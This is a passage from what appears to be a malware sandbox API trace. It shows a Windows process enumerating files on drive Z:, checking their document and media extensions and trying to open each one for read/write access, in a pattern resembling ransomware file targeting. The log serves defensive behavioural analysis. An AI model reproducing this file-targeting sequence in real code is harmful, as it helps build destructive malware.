cFileName="wPgITKWMM0.rtf", cAlternateFileName="")) returned 1 [0186.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.750] PathFindExtensionW (pszPath="Z:\\wPgITKWMM0.rtf") returned=".rtf" [0186.755] CreateFileW (lpFileName="Z:\\wPgITKWMM0.rtf" (normalized: "z:\\wpgitkwmm0.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.756] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17dbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4DTakzSmlzvmIUv.mp3", cAlternateFileName="")) returned 1 [0186.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.756] PathFindExtensionW (pszPath="Z:\\4DTakzSmlzvmIUv.mp3") returned=".mp3" [0186.761] CreateFileW (lpFileName="Z:\\4DTakzSmlzvmIUv.mp3" (normalized: "z:\\4dtakzsmlzvmiuv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.763] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26675040, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x99c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aYwQj9EW4jZuUePCOt1y.jpg", cAlternateFileName="")) returned 1 [0186.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.763] PathFindExtensionW (pszPath="Z:\\aYwQj9EW4jZuUePCOt1y.jpg") returned=".jpg" [0186.768] CreateFileW (lpFileName="Z:\\aYwQj9EW4jZuUePCOt1y.jpg" (normalized: "z:\\aywqj9ew4jzuuepcot1y.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.770] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13e28, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hzhCnO8TQqI.avi", cAlternateFileName="")) returned 1 [0186.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.770] PathFindExtensionW (pszPath="Z:\\hzhCnO8TQqI.avi") returned=".avi" [0186.774] CreateFileW (lpFileName="Z:\\hzhCnO8TQqI.avi" (normalized: "z:\\hzhcno8tqqi.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.776] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd6af, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0fyyBWfRWm61u1MhJ.doc", cAlternateFileName="")) returned 1 [0186.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.776] PathFindExtensionW (pszPath="Z:\\0fyyBWfRWm61u1MhJ.doc") returned=".doc" [0186.780] CreateFileW (lpFileName="Z:\\0fyyBWfRWm61u1MhJ.doc" (normalized: "z:\\0fyybwfrwm61u1mhj.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.782] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd2f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hExQispuuoymhG1i192v.ppt", cAlternateFileName="")) returned 1 [0186.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.782] PathFindExtensionW (pszPath="Z:\\hExQispuuoymhG1i192v.ppt") returned=".ppt" [0186.788] CreateFileW (lpFileName="Z:\\hExQispuuoymhG1i192v.ppt" (normalized: "z:\\hexqispuuoymhg1i192v.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.789] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x100ef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VQa7D2fVvyShxsM.xlsx", cAlternateFileName="")) returned 1 [0186.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.789] PathFindExtensionW (pszPath="Z:\\VQa7D2fVvyShxsM.xlsx") returned=".xlsx" [0186.795] CreateFileW (lpFileName="Z:\\VQa7D2fVvyShxsM.xlsx" (normalized: "z:\\vqa7d2fvvyshxsm.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.797] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xcc9b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nVlM8WgmSnZtiC.avi", cAlternateFileName="")) returned 1 [0186.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.797] PathFindExtensionW (pszPath="Z:\\nVlM8WgmSnZtiC.avi") returned=".avi" [0186.802] CreateFileW (lpFileName="Z:\\nVlM8WgmSnZtiC.avi" (normalized: "z:\\nvlm8wgmsnztic.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.804] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12fc8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6614ZQjKlVVwMsRoTm.pdf", cAlternateFileName="")) returned 1 [0186.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.804] PathFindExtensionW (pszPath="Z:\\6614ZQjKlVVwMsRoTm.pdf") returned=".pdf" [0186.808] CreateFileW (lpFileName="Z:\\6614ZQjKlVVwMsRoTm.pdf" (normalized: "z:\\6614zqjklvvwmsrotm.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.810] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf521, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d9y1S5e4eLHUosqR.png", cAlternateFileName="")) returned 1 [0186.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.810] PathFindExtensionW (pszPath="Z:\\d9y1S5e4eLHUosqR.png") returned=".png" [0186.814] CreateFileW (lpFileName="Z:\\d9y1S5e4eLHUosqR.png" (normalized: "z:\\d9y1s5e4elhuosqr.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.815] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xee3f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sWz45.xls", cAlternateFileName="")) returned 1 [0186.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.815] PathFindExtensionW (pszPath="Z:\\sWz45.xls") returned=".xls" [0186.820] CreateFileW (lpFileName="Z:\\sWz45.xls" (normalized: "z:\\swz45.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.821] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9841, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ydAClD.jpg", cAlternateFileName="")) returned 1 [0186.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.821] PathFindExtensionW (pszPath="Z:\\ydAClD.jpg") returned=".jpg" [0186.825] CreateFileW (lpFileName="Z:\\ydAClD.jpg" (normalized: "z:\\ydacld.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.827] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbccc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NLSuxvhNNdJma1.ods", cAlternateFileName="")) returned 1 [0186.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.827] PathFindExtensionW (pszPath="Z:\\NLSuxvhNNdJma1.ods") returned=".ods" [0186.832] CreateFileW (lpFileName="Z:\\NLSuxvhNNdJma1.ods" (normalized: "z:\\nlsuxvhnndjma1.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.834] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x646c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z3wsaUYVG.ppt", cAlternateFileName="")) returned 1 [0186.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.834] PathFindExtensionW (pszPath="Z:\\z3wsaUYVG.ppt") returned=".ppt" [0186.839] CreateFileW (lpFileName="Z:\\z3wsaUYVG.ppt" (normalized: "z:\\z3wsauyvg.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.841] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd9ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vwYDXw6oVEHN2plf7.xls", cAlternateFileName="")) returned 1 [0186.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.841] PathFindExtensionW (pszPath="Z:\\vwYDXw6oVEHN2plf7.xls") returned=".xls" [0186.846] CreateFileW (lpFileName="Z:\\vwYDXw6oVEHN2plf7.xls" (normalized: "z:\\vwydxw6ovehn2plf7.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.847] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D5VR0w7cu20SVOPPmTeY.pdf", cAlternateFileName="")) returned 1 [0186.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.847] PathFindExtensionW (pszPath="Z:\\D5VR0w7cu20SVOPPmTeY.pdf") returned=".pdf" [0186.852] CreateFileW (lpFileName="Z:\\D5VR0w7cu20SVOPPmTeY.pdf" (normalized: "z:\\d5vr0w7cu20svoppmtey.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.854] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xcf0a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pEa7gL.ppt", cAlternateFileName="")) returned 1 [0186.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.854] PathFindExtensionW (pszPath="Z:\\pEa7gL.ppt") returned=".ppt" [0186.858] CreateFileW (lpFileName="Z:\\pEa7gL.ppt" (normalized: "z:\\pea7gl.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.860] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5d64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SSGieDhFJl7c1ARWbn5.avi", cAlternateFileName="")) returned 1 [0186.860] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.860] PathFindExtensionW (pszPath="Z:\\SSGieDhFJl7c1ARWbn5.avi") returned=".avi" [0186.865] CreateFileW (lpFileName="Z:\\SSGieDhFJl7c1ARWbn5.avi" (normalized: "z:\\ssgiedhfjl7c1arwbn5.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.866] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.866] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1851f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R7Kb10e3K.ppt", cAlternateFileName="")) returned 1 [0186.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.866] PathFindExtensionW (pszPath="Z:\\R7Kb10e3K.ppt") returned=".ppt" [0186.871] CreateFileW (lpFileName="Z:\\R7Kb10e3K.ppt" (normalized: "z:\\r7kb10e3k.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.873] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.873] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6142, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wM2fuYVT5vb5rvE.avi", cAlternateFileName="")) returned 1 [0186.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.873] PathFindExtensionW (pszPath="Z:\\wM2fuYVT5vb5rvE.avi") returned=".avi" [0186.877] CreateFileW (lpFileName="Z:\\wM2fuYVT5vb5rvE.avi" (normalized: "z:\\wm2fuyvt5vb5rve.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.879] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x53dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0O40RGXx.ods", cAlternateFileName="")) returned 1 [0186.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.879] PathFindExtensionW (pszPath="Z:\\0O40RGXx.ods") returned=".ods" [0186.883] CreateFileW (lpFileName="Z:\\0O40RGXx.ods" (normalized: "z:\\0o40rgxx.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.884] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xfcef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RKixholu7QWBM4vIh2Qr.ots", cAlternateFileName="")) returned 1 [0186.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.884] PathFindExtensionW (pszPath="Z:\\RKixholu7QWBM4vIh2Qr.ots") returned=".ots" [0186.888] CreateFileW (lpFileName="Z:\\RKixholu7QWBM4vIh2Qr.ots" (normalized: "z:\\rkixholu7qwbm4vih2qr.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.890] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1446d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z0KtpLCKl6lOwI.csv", cAlternateFileName="")) returned 1 [0186.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.890] PathFindExtensionW (pszPath="Z:\\Z0KtpLCKl6lOwI.csv") returned=".csv" [0186.894] CreateFileW (lpFileName="Z:\\Z0KtpLCKl6lOwI.csv" (normalized: "z:\\z0ktplckl6lowi.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 